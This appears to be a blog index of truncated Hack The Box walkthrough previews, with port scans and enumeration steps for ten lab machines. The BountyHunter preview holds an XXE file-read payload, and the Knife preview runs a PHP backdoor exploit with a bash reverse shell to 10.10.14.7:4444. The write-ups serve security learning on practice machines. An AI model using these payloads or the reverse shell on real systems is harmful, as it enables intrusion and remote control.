Pages

Search

htb

HTB BountyHunter

$ nmap -A 10.10.11.100 -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) http://10.10.11.100/ http://10.10.11.100/resources/README.txt http://10.10.11.100/portal.php http://10.10.11.100/log_submit.php As we can observe in Burp, data is URL+base64 encoded. It’s XML data, so could try an XXE. Using Cyberchef (https://gchq.github.io) on https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe we also find : <!DOCTYPE replace [<!ENTITY xxe SYSTEM «php://filter/convert.base64-encode/resource=file_to_use»> ]> We can use to check other files

HTB Love

$ nmap -A -p- 10.10.10.239 -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap 10.10.10.242 $ nmap 10.10.10.242 -p- -v http://10.10.10.242/ $ whatweb 10.10.10.242 $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/49933.py $ python3 49933.py $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one.https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html $ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn http://10.10.10.245/ Dashboard Security Snapshot IP Config Network status Security Snapshot http://10.10.10.245/data/1 Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds.We can use it to perform a full port scan and with the results, we can use them in combination with Nmap.https://github.com/RustScan/RustScan $ rustscan -a 10.10.10.247 $ sudo nmap -sV -sC 10.10.10.247 -p 2222,42135,42507,59777 In the port scan, we found different open ports.As usually, ssh port is not a common port to start testing so,

HTB Scriptkiddie

$ nmap -A -p- 10.10.10.226 -T4 Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) Accessing to http://10.10.10.226:5000/ In this site we can observe that nmap and msfvenom are used. $ searchsploit msfvenom From nmap we don’t get too much from searchploit, but from msfvenom we just get 1 result.So it is worth trying. msf6 > search venom

HTB Delivery

Add the box to the host file. $ sudo nano /etc/hosts $ nmap delivery.htb -A -p- -T4 Open ports: Site inspection: http://delivery.htb http://delivery.htb/#contact-us http://helpdesk.delivery.htb/index.php http://delivery.htb:8065 As you can create a user into Mattermost server we can start here: http://delivery.htb:8065/should_verify_email?email=user%40rffuste.com We should verify the email, but no email is going to be received.So we need to find a new way. If we focus on Helpdesk site, http://helpdesk.delivery.htb/index.php We can create a

HTB Academy

$ sudo nano /etc/hosts $ nmap academy.htb -A -p- -T4 Open ports: 22(tcp) – ssh 80(tcp) – http 33060(tcp) – mysql Access to http://academy.htb $ python ~/tools/dirsearch/dirsearch.py -u http://academy.htb http://academy.htb/admin.php http://academy.htb/register.php After this step, we would be able to log in to this site. Inspecting with Burb Suite the request when we register our user we can observe: What would happen if we change this value when creating a new user? Modify

HTB Heist

$nmap -sC -sV -oA all -vv -p- 10.10.10.149 $gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e $gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php Accessing to http://10.10.10.149/login.php There is a «Login as Guest» option. http://10.10.10.149/issues.php There is an «Attachment» link. http://10.10.10.149/attachments/config.txt The message talks about a Cisco Router. Hazard said to create a user account for him. So it should be a «hazard» username. Testing admin credentials we’ve just found. we need an

HTB Traceback

$nmap -A -T4 -p- 10.10.10.181 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 80/tcp open http Apache httpd 2.4.29 Access to http://10.10.10.181 Can we assume that there is a Web-shell in this box? Let’s try to find out. $gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells… $gobuster dir